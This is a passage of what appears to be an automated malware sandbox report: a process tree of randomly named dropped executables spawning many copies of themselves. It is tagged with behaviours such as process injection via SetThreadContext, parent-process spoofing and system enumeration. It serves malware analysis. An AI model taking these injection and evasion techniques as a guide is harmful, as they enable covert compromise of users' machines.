- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:14288
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:14488
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:12884
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:13656
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:13136
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:9572
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:16240
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:8860
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:8504
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:13920
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:14148
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:10492
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:13640
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:10232
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:12628
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:5296
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:14788
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 14788 -s 28
      4⤵
      Program crash
      PID:7800
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:908
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:9884
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:10072
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    - Checks processor information in registry
    - Enumerates system info in registry
    PID:7032
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:7092
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:14244
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:13264
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:1456
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:13188
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:5984
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:13440
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:11080
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:8480
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:6268
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:9084
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 9084 -s 28
      4⤵
      Program crash
      PID:10224
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:8144
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:14848
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:228
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:13900
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:13888
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:8084
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:10964
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:15248
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:11220
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:16004
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:14268
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:13064
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:5944
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:11400
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:8716
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:8872
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:13736
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:11496
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:13612
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 13612 -s 28
      4⤵
      Program crash
      PID:12232
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:16156
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:13864
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:14108
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:6672
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:13260
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:15792
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:1300
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:11892
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:9152
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:12504
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:11788
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:4752
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:13932
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:11872
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:2884
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:15756
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:14068
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:10960
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:11504
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:12764
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:5300
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:15352
- C:\Users\Admin\Documents\uy0Uk2WSVM2tzgXZJRQrL6G8.exe
  "C:\Users\Admin\Documents\uy0Uk2WSVM2tzgXZJRQrL6G8.exe"
  2⤵
  - Executes dropped EXE
  PID:2420
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2420 -s 276
    3⤵
    - Program crash
    PID:1420
- C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
  "C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:812
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    - Executes dropped EXE
    PID:5260
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    - Executes dropped EXE
    PID:5616
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    - Executes dropped EXE
    PID:1240
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    - Executes dropped EXE
    PID:5400
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    - Executes dropped EXE
    PID:5904
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    - Executes dropped EXE
    PID:1044
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    - Executes dropped EXE
    PID:1504
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    - Executes dropped EXE
    PID:2680
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:5272
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:5608
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:1676
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:1700
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:6044
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:6476
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:3380
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:2924
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:4396
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:2844
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:6344
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:6768
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    - Suspicious use of NtCreateProcessExOtherParentProcess
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:5912
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:1588
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:4532
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:1060
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:2988
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:4152
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:6428
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:6224
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:5972
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:6860
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:6528
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:2676
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:5684
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:7260
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:8096
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:6896
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:7548
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:7352
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:572
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:7840
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:1544
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:8056
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:5940
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:5148
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:2260
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:6232
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:4544
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:2212
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:4892
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:8152
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:7560
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:4556
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:3224
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    - Checks processor information in registry
    - Enumerates system info in registry
    PID:876
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:3092
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:2600
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:5960
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:4948
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    - Executes dropped EXE
    PID:5820
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:3536
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:4436
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:7120
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:7608
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:8180
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:7184
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:3796
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:5016
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:4160
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:8576
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 8576 -s 28
      4⤵
      Program crash
      PID:8988
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:8872
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:9112
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:5700
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:9032
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:2148
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:8828
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:4200
